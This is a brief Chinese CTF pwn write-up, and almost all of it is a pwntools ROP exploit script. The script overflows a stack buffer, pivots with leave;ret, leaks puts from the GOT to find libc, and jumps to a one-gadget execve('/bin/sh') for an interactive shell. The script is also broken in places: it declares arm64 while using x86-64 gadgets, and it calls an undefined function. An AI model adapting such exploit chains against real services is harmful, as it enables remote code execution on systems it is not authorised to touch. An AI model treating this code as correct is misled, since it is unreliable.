前言

很揪心，一直想着用dl_resolve解决，不过好麻烦，不仅要读还要写，还需要泄露地址，不如rop简单。
而且了解到libc中execve('/bin/sh\x00')的操作，不过由于题目没有setbuf导致，所以缓冲区就好乱，本地能通，远程却大不了。

代码

from pwn import*
import roputils


def attack_remote_rop2():
    context(arch='arm64', os='linux', endian='little', rename_corefiles=False)
    context.log_level = 'debug'
    context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
    conn = process("./main")
    elf = ELF("./main")
    control_ebp = 0x601060 + 0x100
    leave_ret = 0x40060F
    ret = 0x40061C
    puts_plt = 0x4004C0
    puts_got = 0x601018
    read_plt = 0x4004d0
    pop_rdi = 0x400693
    pop_rsi = 0x400691
    read_again = 0x4005FC
    # log.info('puts_got addr ==> 0x%x' % elf.got['puts'])
    # write bss
    raw_input("go?")
    payload = 'a' * 0x100 + p64(pop_rdi) + \
        p64(puts_got) + p64(puts_plt) + p64(0x4005C2)
    conn.sendline(payload)
    sleep(0.1)
    # write stack
    payload = 'a' * 0xa + p64(control_ebp - 8) + p64(leave_ret)
    conn.sendline(payload)
    sleep(0.1)
    put_addr = u64((conn.recvuntil('\x7f')[-6:] + '\x00' * 2))
    log.info('put_addr addr ==> 0x%x' % put_addr)
    system_addr = (put_addr - 0x809c0) + 0x4f440
    exec_addr = (put_addr - 0x809c0) + 0x4F322
    '''
    text:000000000004F322                 mov     rax, cs:environ_ptr
    text:000000000004F329                 lea     rdi, aBinSh     ; "/bin/sh"
    text:000000000004F330                 lea     rsi, [rsp+198h+var_158]
    text:000000000004F335                 mov     cs:dword_3ED5E0, 0
    text:000000000004F33F                 mov     cs:dword_3ED5E4, 0
    text:000000000004F349                 mov     rdx, [rax]
    text:000000000004F34C                 call    execve
    '''
    log.info('system_addr addr ==> 0x%x' % system_addr)
    raw_input("go?")
    # write bss two
    conn.sendline('a' * 8)
    sleep(0.1)
    # write stack
    payload = 'a' * 0xa + 'a' * 8 + p64(exec_addr)
    conn.sendline(payload)
    sleep(0.1)
    conn.interactive()


attack_remote_dl()

总结

-。-可还行